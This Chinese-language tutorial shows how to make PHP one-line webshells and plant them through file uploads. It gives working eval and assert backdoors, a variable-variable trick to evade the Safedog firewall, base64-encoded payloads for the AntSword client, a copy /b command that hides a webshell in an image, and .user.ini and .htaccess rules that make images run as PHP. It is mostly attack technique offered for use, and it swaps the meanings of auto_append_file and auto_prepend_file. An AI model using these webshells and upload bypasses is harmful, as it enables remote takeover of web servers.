一句话木马制作

正常：

<?php
@eval($_POST['x']);
?>

如果有<?过滤，采用：

<script language="php">eval($_REQUEST[x])</script>

一种简单的绕安全狗方法：变量传递

<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_POST['z']);

传入方法：http://php?x=b&y=assert
post:z=phpinfo();

问：为什么这里不用eval
因为eval赋值给b没有效果的。

对传入数据进行加密

<?php assert(base64_decode($_POST['x']));?>

当这种情况用蚁剑连接时，需要采用base64加密。

图片马制作

1.首先图片命名111.jpg

2.再新建222.asp文件，一句话木马写入

3.然后win+R，cmd，cd到之前图片的目录路径下，命令为copy 111.jpg/b+222.asp/a 333.jpg

最后就会出现新的图片3333.jpg，就是制作出的图片马。

文件上传之后缀替换

php2，php3、php4、php5，pht，phtml，phps

.JPEG;.JPE;.JPG，”JPGGraphic File”
.gif，”GIF89A”
.zip，”Zip Compressed”
.doc;.xls;.xlt;.ppt;.apr，”MS Compound Document v1 or Lotus Approach APRfile”

user.ini

.user.ini。
利用条件：含有.user.ini的文件夹下需要有正常的php文件，否则也不能包含了

它比.htaccess用的更广，不管是nginx/apache/IIS，只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi，我的IIS php5.3以上的全部用的fastcgi/cgi，我win下的apache上也用的fcgi，可谓很广，不像.htaccess有局限性。

CGI全称”通用网关接口”（Common Gateway Interface），用于HTTP服务器与其它机器上的程序服务通信交流的一种工具，CGI程序须运行在网络服务器上
FastCGI是一个可伸缩地、高速地在HTTP服务器和动态脚本语言间通信的接口（FastCGI接口在Linux下是socket（可以是文件socket，也可以是ip socket）），主要优点是把动态语言和HTTP服务器分离开来。多数流行的HTTP服务器都支持FastCGI，包括Apache、Nginx和lightpd。

除了主 php.ini 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（$_SERVER[‘DOCUMENT_ROOT’] 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。

.user.ini实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。（上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置）

实际上，除了PHP_INI_SYSTEM以外的模式（包括PHP_INI_ALL）都是可以通过.user.ini来设置的

auto_append_file
指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数
auto_prepend_file 是在文件后面包含

使用方法很简单，直接写在.user.ini中：

auto_prepend_file=01.gif

htaccess

针对apache

文件后缀为 .htaccess
保存类型为所有文件

上传.htaccess 必须是网站根路径

让png解析为php

可以在.htaccess 加入php解析规则
类似于把文件名包含1的解析成php

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
123456.png  就会以php执行